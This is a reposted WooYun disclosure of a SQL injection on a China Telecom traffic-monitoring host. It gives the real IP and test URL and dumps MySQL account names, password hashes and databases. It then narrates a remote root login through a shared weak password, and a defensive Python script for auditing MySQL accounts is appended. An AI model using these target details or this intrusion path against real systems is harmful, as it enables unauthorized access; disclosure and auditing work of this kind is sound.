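Reposted from WooYun

Found it pretty much by accident~ and the break-in was pretty startling~

1. I stumbled on a rather odd SQL injection vulnerability at China Telecom (it appears to be there for monitoring traffic to customers' websites). This situation may be common across China Telecom IDCs. Test address: http://118.123.206.9/preuid.php?uid=2610023800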

Web Server: Apache/2.2.23 (Unix) PHP/5.4.7

Powered-by: PHP/5.4.7

DB Server: MySQL >=5

Current User: root@localhost

Sql Version: 5.5.28-log

Current DB: analytics

System User: root@localhost

Host Name: localhost.localdomain

Installation dir: /usr

DB User & Pass: root:*70A3DDDA7052B54160CE5B0BF385872C8E470224:localhost

root::localhost.localdomain

root::127.0.0.1

::localhost

::localhost.localdomain

remote:*A4B6157319038724E3560894F7F932C8886EBFCF:%

root:*70A3DDDA7052B54160CE5B0BF385872C8E470224:%

hpflow:*70A3DDDA7052B54160CE5B0BF385872C8E470224:118.123.206.9

web:*A4B6157319038724E3560894F7F932C8886EBFCF:%

hpflow:*70A3DDDA7052B54160CE5B0BF385872C8E470224:118.123.206.7

Data Bases: information_schema

IDC

analytics

mysql

netflow

performance_schema

rec_web

report

report1

test

web

web_test

zj

Nothing much to see on the front end~

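2. The database privilege is still root. OK, it looks like the database lets the web and remote users connect from outside, and they all use the same weak password. OK~ so let's telnet in and see whether it is on the default port~~~
bingo~ root privileges again~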

3. Let's see if there is anything good in here~ Looks like quite a few websites are being monitored~

4. Well~ having come this far, not getting a shell would be letting myself down~ (privilege escalation is pointless by now)
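The "DB User & Pass" listing in step 1 and the remote login in step 2 come down to account hygiene: empty passwords, anonymous accounts, `%` wildcard hosts (including for root) and one password reused across accounts. As an added example (not part of the original write-up), this audit runs over a `user:hash:host` export of the MySQL account table in the layout shown above; the sample data, the `app` account and the finding names are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample in the user:hash:host layout of the listing above.
# The hashes and the "app" account are made up for illustration.
SAMPLE = """\
root:*1111111111111111111111111111111111111111:localhost
root::localhost.localdomain
::localhost
remote:*2222222222222222222222222222222222222222:%
root:*1111111111111111111111111111111111111111:%
app:*1111111111111111111111111111111111111111:192.0.2.10
web:*2222222222222222222222222222222222222222:%
"""

def parse_accounts(text):
    """Yield (user, hash, host); the host may itself contain ':' (IPv6)."""
    for line in text.splitlines():
        parts = line.strip().split(":", 2)
        if len(parts) == 3 and parts[2]:
            yield tuple(parts)

def audit(text):
    """Return sorted (finding, subject) pairs for risky account entries."""
    findings, users_by_hash = [], defaultdict(set)
    for user, pw_hash, host in parse_accounts(text):
        who = f"{user or '<anonymous>'}@{host}"
        if not user:
            findings.append(("anonymous-account", who))
        if not pw_hash:
            findings.append(("empty-password", who))
        else:
            users_by_hash[pw_hash].add(user)
        if "%" in host:  # MySQL wildcard: login allowed from matching remote hosts
            findings.append(("wildcard-host", who))
            if user == "root":
                findings.append(("remote-root", who))
    # These hashes are unsalted, so the same hash under different account
    # names means the same password is reused.
    for users in users_by_hash.values():
        if len(users) > 1:
            findings.append(("shared-password", ",".join(sorted(users))))
    return sorted(findings)

if __name__ == "__main__":
    for finding, subject in audit(SAMPLE):
        print(f"{finding:18} {subject}")
```

Each finding maps to a fix: set or drop empty-password and anonymous accounts, replace `%` with the specific application host, keep root local-only, and give every account its own strong password.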
